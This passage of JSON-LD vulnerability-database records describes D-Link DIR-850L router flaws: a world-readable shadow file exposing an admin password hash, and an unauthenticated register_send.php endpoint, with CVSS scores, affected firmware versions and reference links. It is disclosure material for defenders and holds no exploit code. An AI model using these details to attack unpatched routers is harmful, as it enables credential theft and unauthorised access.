        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:29:10.322000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A  and REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100051"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-276",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105145"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14424"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14424"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14424"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105145"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14424"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105145"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14424"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105145"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "date": "2017-09-13T17:29:00.633000",
        "db": "NVD",
        "id": "CVE-2017-14424"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105145"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "date": "2023-11-17T20:00:53.310000",
        "db": "NVD",
        "id": "CVE-2017-14424"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0597

Vulnerability from variot - Updated: 2023-12-18 13:29

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0644 /var/etc/shadow (aka the /etc/shadow symlink target) permissions, i.e. the shadow file is readable by every local user. D-Link DIR-850L device firmware contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. A security vulnerability exists in REV. A devices using firmware FW114WWb07_h2ab_beta1 and earlier and in REV. B devices using firmware FW208WWb02 and earlier. An attacker could exploit this vulnerability to obtain the DES password hash of an administrator user.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0597",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14426"
      }
    ]
  },
  "cve": "CVE-2017-14426",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14426",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2017-31783",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-105147",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14426",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14426",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31783",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-569",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105147",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0644 /var/etc/shadow (aka the /etc/shadow symlink target) permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit this vulnerability to obtain a DES hash of an administrator user",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105147"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14426",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105147",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ]
  },
  "id": "VAR-201709-0597",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105147"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:29:10.294000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A  and REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100049"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14426"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14426"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14426"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105147"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "date": "2017-09-13T17:29:00.760000",
        "db": "NVD",
        "id": "CVE-2017-14426"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31783"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105147"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      },
      {
        "date": "2023-11-17T20:00:16.387000",
        "db": "NVD",
        "id": "CVE-2017-14426"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008101"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-569"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0588

Vulnerability from variot - Updated: 2023-12-18 13:24

register_send.php on D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices does not require authentication, which can result in unintended enrollment in mydlink Cloud Services. The D-Link DIR-850L device firmware contains an access control vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-850L REV. B is a wireless router from D-Link. A security vulnerability exists in the register_send.php file on D-Link DIR-850L REV. B devices using firmware FW208WWb02 and earlier. The vulnerability stems from the program not requiring authentication. An attacker could exploit the vulnerability to gain access.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0588",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14417"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14417"
      }
    ]
  },
  "cve": "CVE-2017-14417",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
